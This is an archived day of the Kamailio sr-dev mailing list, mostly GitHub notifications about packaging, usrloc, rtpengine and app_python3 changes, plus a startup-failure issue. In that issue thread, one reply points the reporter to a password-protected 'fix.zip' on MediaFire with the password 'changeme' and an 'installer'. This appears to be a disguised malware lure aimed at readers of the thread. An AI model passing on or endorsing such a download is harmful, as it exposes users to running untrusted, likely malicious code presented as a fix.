[sr-dev] Re: [kamailio/kamailio] kafka: build .deb package with kafka.so (PR #3952)

2024-08-28 Thread Victor Seva via sr-dev
Closed #3952 via c2ea356b9178c989083111dbc3bf13d993640dc8. -- Reply to this email directly or view it on GitHub: https://github.com/kamailio/kamailio/pull/3952#event-14042394882 You are receiving this because you are subscribed to this thread. Message ID:

[sr-dev] git:master:c2ea356b: pkg/kamailio/deb: add kafka package

2024-08-28 Thread Victor Seva via sr-dev
Module: kamailio Branch: master Commit: c2ea356b9178c989083111dbc3bf13d993640dc8 URL: https://github.com/kamailio/kamailio/commit/c2ea356b9178c989083111dbc3bf13d993640dc8 Author: Victor Seva Committer: Victor Seva Date: 2024-08-27T16:11:26+02:00 pkg/kamailio/deb: add kafka package fixes #3952

[sr-dev] Re: [kamailio/kamailio] kafka: build .deb package with kafka.so (PR #3952)

2024-08-28 Thread Stefan Mititelu via sr-dev
Thanks! :+1: -- Reply to this email directly or view it on GitHub: https://github.com/kamailio/kamailio/pull/3952#issuecomment-2314646512 You are receiving this because you are subscribed to this thread. Message ID: ___ Kamailio (SER) - Development Ma

[sr-dev] git:master:6502872d: usrloc: mark contacts with keepalive sent

2024-08-28 Thread Daniel-Constantin Mierla via sr-dev
Module: kamailio Branch: master Commit: 6502872d35d9bd7043bf54cd1d640dd64ae87115 URL: https://github.com/kamailio/kamailio/commit/6502872d35d9bd7043bf54cd1d640dd64ae87115 Author: Daniel-Constantin Mierla Committer: Daniel-Constantin Mierla Date: 2024-08-28T10:52:55+02:00 usrloc: mark contacts

[sr-dev] git:master:98825a7b: pkg/kamailio/deb: fix noble lintian errors [skip ci]

2024-08-28 Thread Victor Seva via sr-dev
Module: kamailio Branch: master Commit: 98825a7bef452cae015e7491cfba1c7aad6051e2 URL: https://github.com/kamailio/kamailio/commit/98825a7bef452cae015e7491cfba1c7aad6051e2 Author: Victor Seva Committer: Victor Seva Date: 2024-08-28T11:02:07+02:00 pkg/kamailio/deb: fix noble lintian errors [skip

[sr-dev] Re: [kamailio/kamailio] rtpengine: fix api using ki functions (PR #3956)

2024-08-28 Thread Richard Fuchs via sr-dev
@rfuchs commented on this pull request. > typedef struct rtpengine_api { rtpengine_start_recording_f start_recording; rtpengine_answer_f answer; rtpengine_offer_f offer; - rtpengine_delete_f delete; + rtpengine_delete_f _delete; > Thanks for the review. I

[sr-dev] Re: [kamailio/kamailio] Kemi app_python3 throws a TypeError (Issue #3915)

2024-08-28 Thread Henning Westerholt via sr-dev
@michelpelletier07 You missed an important step, you need to create a private fork from the public kamailio repository first. Then you do the changes in your fork and push them there. Then you can create the PR against the kamailio official repository. Refer e.g. to this documentation: [link](h

[sr-dev] [kamailio/kamailio] app_python3: Fixes Kemi TypeError thrown when latency_limit_action is… (PR #3959)

2024-08-28 Thread michelpelletier07 via sr-dev
- [X] Commit message has the format required by CONTRIBUTING guide - [X] Commits are split per component (core, individual modules, libs, utils, ...) - [X] Each component has a single commit (if not, squash them into one commit) - [X] No commits to README files for modules (changes must be done t

[sr-dev] Re: [kamailio/kamailio] Kemi app_python3 throws a TypeError (Issue #3915)

2024-08-28 Thread michelpelletier07 via sr-dev
Hi, I created the PR. Thanks for your help. Regards, Michel Pelletier On Wed, Aug 28, 2024 at 8:38 AM Henning Westerholt ***@***.***> wrote: > @michelpelletier07 You missed an > important step, you need to create a private fork from the public kamailio >

[sr-dev] [kamailio/kamailio] Start up failed: waiting for child one too long (Issue #3960)

2024-08-28 Thread Chen Ziyan via sr-dev
### Start up failed with error " waiting for child one too long" execute start up command, and suddenly failed. ` sudo /usr/local/sbin/kamailio -m 128 -M 8 -E -e -dd -f /usr/local/etc/kamailio/kamailio.cfg ` ### Troubleshooting Reproduction Maybe the problem of my env. Debug

[sr-dev] Re: [kamailio/kamailio] Start up failed: waiting for child one too long (Issue #3960)

2024-08-28 Thread AFRICANO BYAMUGISHA via sr-dev
Download https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file password: changeme In the installer menu, select "gcc." -- Reply to this email directly or view it on GitHub: https://github.com/kamailio/kamailio/issues/3960#issuecomment-231780 You are receiving this because you are subsc

[sr-dev] Re: [kamailio/kamailio] Start up failed: waiting for child one too long (Issue #3960)

2024-08-28 Thread Chen Ziyan via sr-dev
Closed #3960 as completed. -- Reply to this email directly or view it on GitHub: https://github.com/kamailio/kamailio/issues/3960#event-14055828350 You are receiving this because you are subscribed to this thread. Message ID: ___ Kamailio (SER) - Devel